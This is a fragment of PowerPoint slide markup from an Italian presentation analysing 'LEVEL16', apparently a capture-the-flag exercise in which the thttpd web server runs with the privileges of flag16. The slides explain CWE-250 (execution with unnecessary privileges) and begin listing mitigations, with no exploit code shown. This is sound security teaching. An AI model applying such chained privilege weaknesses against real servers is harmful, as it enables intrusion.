              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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03</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Elemento grafico 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AF6E8A-CEDB-6A63-AA43-ADB8D2748F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37500" y="1111827"/>
            <a:ext cx="2919846" cy="2919846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20298214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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1339772" y="525726"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>VULNERABILITà IN LEVEL16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="344416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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>vulnerabilità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> appena vista si verifica solo se diverse debolezze sono presenti e sfruttate contemporaneamente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>Debolezza #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Il Web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" err="1"/>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> esegue con privilegi di esecuzione ingiustamente elevati, precisamente quelli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>CWE di riferimento: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>CWE-250 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>Unnecessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>Privileges</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" u="sng">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/250.html</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66477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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Google Shape;6010;p113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7169D0D-02CB-77E8-DB9F-26433857D816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="255546" y="3128247"/>
            <a:ext cx="469655" cy="428140"/>
            <a:chOff x="1508720" y="1289039"/>
            <a:chExt cx="469655" cy="428140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Google Shape;6011;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA113F4D-6384-2568-1FB2-65A408580CBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510135" y="1660388"/>
              <a:ext cx="450908" cy="53198"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="20902" h="2466" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="20901" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20901" y="1347"/>
                    <a:pt x="19783" y="2444"/>
                    <a:pt x="18436" y="2465"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2466" y="2465"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1099" y="2444"/>
                    <a:pt x="1" y="1347"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20901" y="0"/>
                  </a:move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012;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AE6BB7-D1CD-D5C0-C9C6-1A0357CC016B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1544996" y="1412369"/>
              <a:ext cx="381186" cy="248041"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="17670" h="11498" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1616" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16054" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16945" y="22"/>
                    <a:pt x="17649" y="726"/>
                    <a:pt x="17670" y="1617"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="17670" y="11497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="11497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1617"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="726"/>
                    <a:pt x="726" y="22"/>
                    <a:pt x="1616" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1616" y="1"/>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013;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3304C466-BE20-B52C-3DA2-DF3637913341}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1632127" y="1301551"/>
              <a:ext cx="206923" cy="227482"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9592" h="10545" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2632" y="10544"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2445" y="8494"/>
                    <a:pt x="1" y="7769"/>
                    <a:pt x="1" y="4806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2155"/>
                    <a:pt x="2134" y="1"/>
                    <a:pt x="4786" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7437" y="1"/>
                    <a:pt x="9592" y="2155"/>
                    <a:pt x="9592" y="4806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9592" y="7769"/>
                    <a:pt x="7147" y="8494"/>
                    <a:pt x="6940" y="10544"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2632" y="10544"/>
                  </a:move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014;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D732170-DBBC-D711-065E-57A98641F3EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1688884" y="1529012"/>
              <a:ext cx="92977" cy="86700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4310" h="4019" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4309" y="1844"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4309" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1865"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3045"/>
                    <a:pt x="974" y="4019"/>
                    <a:pt x="2155" y="4019"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3356" y="4019"/>
                    <a:pt x="4309" y="3045"/>
                    <a:pt x="4309" y="1865"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4309" y="1844"/>
                  </a:move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015;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85102140-0F28-777B-EE7C-8014D236427F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1508720" y="1289526"/>
              <a:ext cx="469655" cy="427653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21771" h="19824" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21625" y="16633"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21543" y="16551"/>
                    <a:pt x="21439" y="16509"/>
                    <a:pt x="21335" y="16509"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20134" y="16509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20134" y="7064"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20134" y="5945"/>
                    <a:pt x="19223" y="5034"/>
                    <a:pt x="18104" y="5034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16095" y="5034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16074" y="2879"/>
                    <a:pt x="14728" y="953"/>
                    <a:pt x="12718" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12159" y="0"/>
                    <a:pt x="11869" y="808"/>
                    <a:pt x="12408" y="1015"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14106" y="1657"/>
                    <a:pt x="15246" y="3294"/>
                    <a:pt x="15246" y="5116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15246" y="6629"/>
                    <a:pt x="14541" y="7519"/>
                    <a:pt x="13858" y="8369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13361" y="8969"/>
                    <a:pt x="12863" y="9611"/>
                    <a:pt x="12677" y="10440"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12263" y="10440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12718" y="4226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12739" y="4102"/>
                    <a:pt x="12698" y="3977"/>
                    <a:pt x="12615" y="3894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12532" y="3812"/>
                    <a:pt x="12428" y="3770"/>
                    <a:pt x="12304" y="3770"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9446" y="3770"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9342" y="3770"/>
                    <a:pt x="9218" y="3812"/>
                    <a:pt x="9135" y="3894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9073" y="3977"/>
                    <a:pt x="9031" y="4102"/>
                    <a:pt x="9031" y="4226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9487" y="10440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9093" y="10440"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8907" y="9611"/>
                    <a:pt x="8389" y="8969"/>
                    <a:pt x="7892" y="8369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7208" y="7499"/>
                    <a:pt x="6504" y="6629"/>
                    <a:pt x="6504" y="5096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6504" y="3273"/>
                    <a:pt x="7643" y="1657"/>
                    <a:pt x="9342" y="1015"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9881" y="829"/>
                    <a:pt x="9591" y="21"/>
                    <a:pt x="9052" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7043" y="953"/>
                    <a:pt x="5676" y="2879"/>
                    <a:pt x="5655" y="5034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3666" y="5034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2527" y="5034"/>
                    <a:pt x="1616" y="5945"/>
                    <a:pt x="1616" y="7064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1616" y="16509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435" y="16509"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="16509"/>
                    <a:pt x="0" y="16696"/>
                    <a:pt x="0" y="16944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18539"/>
                    <a:pt x="1284" y="19823"/>
                    <a:pt x="2900" y="19823"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18870" y="19823"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20465" y="19823"/>
                    <a:pt x="21770" y="18539"/>
                    <a:pt x="21770" y="16944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21770" y="16820"/>
                    <a:pt x="21729" y="16716"/>
                    <a:pt x="21646" y="16633"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9963" y="11269"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12615" y="11269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12615" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9156" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9156" y="11269"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12553" y="13133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12118" y="14893"/>
                    <a:pt x="9632" y="14893"/>
                    <a:pt x="9197" y="13133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9922" y="4599"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11848" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11413" y="10419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10357" y="10419"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2465" y="7064"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2465" y="6421"/>
                    <a:pt x="3004" y="5883"/>
                    <a:pt x="3666" y="5883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5717" y="5883"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5924" y="7229"/>
                    <a:pt x="6608" y="8099"/>
                    <a:pt x="7229" y="8886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7747" y="9529"/>
                    <a:pt x="8223" y="10109"/>
                    <a:pt x="8306" y="10875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8306" y="12698"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8203" y="14210"/>
                    <a:pt x="9383" y="15473"/>
                    <a:pt x="10896" y="15473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12387" y="15473"/>
                    <a:pt x="13568" y="14210"/>
                    <a:pt x="13464" y="12698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13464" y="10875"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13547" y="10109"/>
                    <a:pt x="14003" y="9549"/>
                    <a:pt x="14541" y="8886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15163" y="8099"/>
                    <a:pt x="15846" y="7229"/>
                    <a:pt x="16053" y="5883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18104" y="5883"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18746" y="5883"/>
                    <a:pt x="19285" y="6421"/>
                    <a:pt x="19285" y="7064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19285" y="16509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465" y="16509"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18870" y="18995"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2900" y="18995"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1926" y="18974"/>
                    <a:pt x="1098" y="18311"/>
                    <a:pt x="891" y="17379"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20859" y="17379"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20652" y="18311"/>
                    <a:pt x="19823" y="18974"/>
                    <a:pt x="18870" y="18995"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18870" y="18995"/>
                  </a:move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016;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C3EBB7-A99B-9BD9-3196-3F804DD74D18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1726421" y="1289039"/>
              <a:ext cx="21465" cy="21486"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="995" h="996" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="415" y="995"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="995"/>
                    <a:pt x="995" y="539"/>
                    <a:pt x="726" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="1"/>
                    <a:pt x="1" y="187"/>
                    <a:pt x="1" y="581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="809"/>
                    <a:pt x="187" y="995"/>
                    <a:pt x="415" y="995"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="415" y="995"/>
                  </a:move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9" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725201" y="500959"/>
            <a:ext cx="77040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it-IT" sz="3200"/>
              <a:t>CWE-250 EsecUZIONE CON PRIVILEGI NON NECESSARI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7687365" y="877299"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="184427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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Possono essere esposti nuovi punti deboli perché l’esecuzione con privilegi aggiuntivi, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>, può disabilitare i normali controlli di sicurezza eseguiti dal Sistema Operativo o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1"/>
              <a:t>dall’environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Capita quando un processo è in esecuzione come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> e quando viene eseguito un segnale o un processo secondario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>Potenziali mitigazioni:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;4976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19479576-38D5-97FD-7333-158F68565EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819821" y="3096491"/>
            <a:ext cx="3752179" cy="184427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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Strategy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Environment </a:t>
